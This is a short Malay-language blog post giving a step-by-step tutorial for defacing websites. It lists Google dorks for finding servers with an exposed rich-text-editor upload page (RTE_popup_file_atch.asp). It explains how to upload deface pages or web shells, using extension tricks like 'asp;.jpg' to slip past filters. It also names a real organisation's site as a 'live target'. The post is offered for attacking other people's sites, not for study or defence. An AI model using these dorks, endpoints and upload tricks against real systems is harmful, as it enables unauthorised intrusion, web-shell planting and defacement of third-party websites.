Assalamualaikum...lama tak post entry baru.huhu...sorry bz skolah...ok jom mula.malas nk tulis pnjang2.
1. Search google salah 1 dork ni :
- inurl:rte/my_documents/my_files
- inurl:/my_documents/my_files/
Pilih salah satu website.
2. Masukkan exploit dibawah di hujung url :
Exploit:
Exploit:
http://www.website.com/rte/RTE_popup_file_atch.asp
Atau
http://www.website.com/admin/RTE_popup_file_atch.asp
 |
| Tekan Choose File untuk pilih file korang.Lepas tu tekan Upload untuk Upload!!!Link hasil korang akan terpapar di dalam kotak File Url. |
Akhir sekali upload deface korang.korang bole try upload shell dengan format asp;.jpg atau php;,jpg
4. Seletah berjaya upload korang akan nampak link deface/shell korang tu.
Contoh :
| File URL: | |||||
Link korang tu akan ada dalam kotak ni.
Itu saja.Mudah kan??selamat berjaya!
Live Targets :
http://www.jrf.org.tw/newjrf/rte/RTE_popup_file_atch.asp
Live Targets :
http://www.jrf.org.tw/newjrf/rte/RTE_popup_file_atch.asp
Semoga bertemu lagi.Assalamualaikum...
